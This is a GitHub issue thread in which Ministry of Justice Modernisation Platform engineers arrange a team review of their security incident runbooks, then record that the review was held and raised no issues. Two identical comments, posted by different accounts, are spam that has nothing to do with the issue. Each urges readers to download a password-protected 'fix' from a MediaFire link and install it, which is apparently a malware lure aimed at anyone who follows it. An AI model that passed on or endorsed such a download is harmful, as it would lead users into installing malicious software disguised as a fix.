### ISSUE TITLE
Team Review of Runbooks for Security Incident Alerts

### ISSUE THREAD

**Issue by mikereiddigital** [ministryofjustice/modernisation-platform#7785]
### User Story

As a Modernisation Platform Engineer we need to review, as a team the runbooks for handling security incidents. This was one of the DoDs of ticket #7551.

### Value / Purpose

Follow-on from #7551 

### Useful Contacts

Edd Proctor

### Definition of Done

DoD:
- [ ] Undertake team review of security incident runbooks as covered in #7551 
- [ ] Update with any agreed amendments.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mikereiddigital** [comment]
Have booked 11.30am on Monday 7th October for the review. Only 30mins is free so if it carries over I'll book another.

**Comment by mikereiddigital** [comment]
We had a review call today at 11.30 where @ep-93 took us through the documentation. No issues were raised.
